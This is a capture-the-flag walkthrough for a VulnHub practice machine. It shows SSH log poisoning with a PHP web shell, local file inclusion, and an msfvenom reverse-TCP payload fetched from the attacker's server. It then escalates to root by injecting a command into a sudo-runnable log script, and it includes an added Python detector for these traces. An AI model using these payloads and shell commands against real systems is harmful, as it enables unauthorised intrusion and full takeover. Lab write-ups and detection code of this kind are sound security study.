Target machine: https://www.vulnhub.com/entry/the-ether-evilscience,212

Information gathering

The target's IP is 192.168.0.39

Scan the target for everything: nmap -A -T4 192.168.0.39

root@kali:~# nmap -A -T4 192.168.0.39

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:C4:FE:6A (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.03 ms 192.168.0.39

The target only exposes SSH and HTTP, so start with HTTP: visit http://<target IP>

Browsing the site, it looks like it has a file inclusion vulnerability

To make the testing easier, everything below is done inside Burp Suite with the proxy capturing requests

Following the hint above (only SSH and Apache's HTTP service are open), try including the Apache and SSH log files:

/var/log/apache/access.log
/var/log/apache2/access.log
/var/www/log/access.log
/var/log/secure
/var/log/auth.log

Requesting the SSH log file produced output, which confirms that the site has a file inclusion vulnerability

Exploitation

Use SSH to inject the command-execution code into the log

Pretend to connect over SSH and type any password; one attempt is enough to continue, and entering it too many times apparently causes problems

ssh '<?php @system($_GET[cmd]); ?>'@192.168.0.39
<?php @system($_GET[cmd]); ?>@192.168.0.39's password:
Permission denied, please try again.

Back in Burp, add the parameter; once the ls command successfully lists the directory, we have what we came for. Now for the main event

Here msf is used for the exploitation

First use msf to generate a Linux payload (a PHP one would work too); a Linux payload is generated here to make creating a user easier later
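As an added defender-side example (not code from the original write-up), the following Python checks for the two traces this technique leaves: sshd "Invalid user" entries whose username contains a PHP tag, and web requests whose file= parameter points at a log path or traverses directories. The sample log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (not taken from the original write-up): an sshd
# failure whose "username" carries a PHP tag, a benign sshd failure, and Apache
# access entries for ?file=...&cmd=... requests of the kind shown above.
AUTH_LOG = """\
Nov  9 15:40:01 theEther sshd[1234]: Invalid user <?php @system($_GET[cmd]); ?> from 192.168.0.42
Nov  9 15:41:10 theEther sshd[1240]: Invalid user bob from 192.168.0.42
"""
ACCESS_LOG = """\
192.168.0.42 - - [09/Nov/2017:15:42:00 +0000] "GET /?file=/var/log/auth.log&cmd=ls HTTP/1.1" 200 512
192.168.0.42 - - [09/Nov/2017:15:42:05 +0000] "GET /?file=index.php HTTP/1.1" 200 2048
192.168.0.42 - - [09/Nov/2017:15:42:09 +0000] "GET /?file=/var/log/auth.log&cmd=wget+http%3a%2f%2f192.168.0.42%3a8000%2fdest HTTP/1.1" 200 128
"""

PHP_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)   # "<?php" or "<?=" inside user-supplied text
INVALID_USER = re.compile(r"sshd\[\d+\]: Invalid user (.+?) from (\S+)")
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
SENSITIVE_PREFIXES = ("/var/log/", "/var/www/log/", "/proc/self/")


def find_poisoned_auth_lines(text):
    """Return (username, source_ip) for sshd failures whose username embeds a PHP tag,
    i.e. the trace left when auth.log is seeded with code for a later include."""
    hits = []
    for line in text.splitlines():
        m = INVALID_USER.search(line)
        if m and PHP_TAG.search(m.group(1)):
            hits.append((m.group(1), m.group(2)))
    return hits


def find_lfi_requests(text):
    """Return (client_ip, file_param, cmd_param_or_None) for requests whose file=
    parameter points at a log/proc path or uses directory traversal."""
    hits = []
    for line in text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        params = parse_qs(urlsplit(target).query)   # percent-decodes and splits values
        for value in params.get("file", []):
            if value.startswith(SENSITIVE_PREFIXES) or "../" in value:
                hits.append((ip, value, params.get("cmd", [None])[0]))
    return hits
```

Both functions can be run over real auth.log and access.log files; a hit in the first function is the indicator to alert on, since a legitimate login name never contains a PHP tag.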

msfvenom -p linux/x86/meterpreter/reverse_tcp lport=5555 lhost=192.168.0.42 -f elf > dest

Start an HTTP server in the same directory

python -m SimpleHTTPServer 8000

Get a reverse shell

?file=/var/log/auth.log&cmd=wget+http://192.168.0.42:8000/dest
Special characters must be URL-encoded.
URL-encoded: ?file=/var/log/auth.log&cmd=wget+http%3a%2f%2f192.168.0.42%3a8000%2fdest

Put the encoded parameters into the request in Burp and hit Go

Open another terminal, set the parameters, and start the listener

Give the file execute permission, then run it to get the shell back

?file=/var/log/auth.log&cmd=chmod+%2bx+dest
?file=/var/log/auth.log&cmd=./dest

At this point we have a shell; I didn't bother taking a screenshot

Privilege escalation

Check the kernel version with uname; the Dirty COW (dirtyCow) privilege escalation came to mind as possibly applicable:

uname -a
Linux theEther 4.10.0-40-generic #44~16.04.1-Ubuntu SMP Thu Nov 9 15:33:07 UTC 2017 i686 i686 i686 GNU/Linux

Uploaded the Dirty COW exploit to the target, compiled and ran it... no response.

g++ -std=c++11 -pthread -o dst dirtyCow.cpp -lutil
./dst

Back in the shell there is a suspicious file; sudo --list shows that this file can actually be run as root

Run the script with sudo

Open yet another terminal, start a listener in msf, and construct the input to execute:

sudo ./xxxlogauditorxxx.py
Load which log?: /var/log/auth.log|./dest

Successfully got a shell with root privileges; now we can do "whatever we want"

Getting the flag

Switching to the root directory reveals a flag.png,

Hmm... the image doesn't seem to contain anything

While trying to grep for key strings, a long base64-encoded string turned up at the end:

strings flag.png | grep flag

flag:

Decoding the base64 gives a story...

For some reason, this story reminded me of the inhumane "human experiments" the Japanese Kwantung Army carried out back then for its "germ experiments"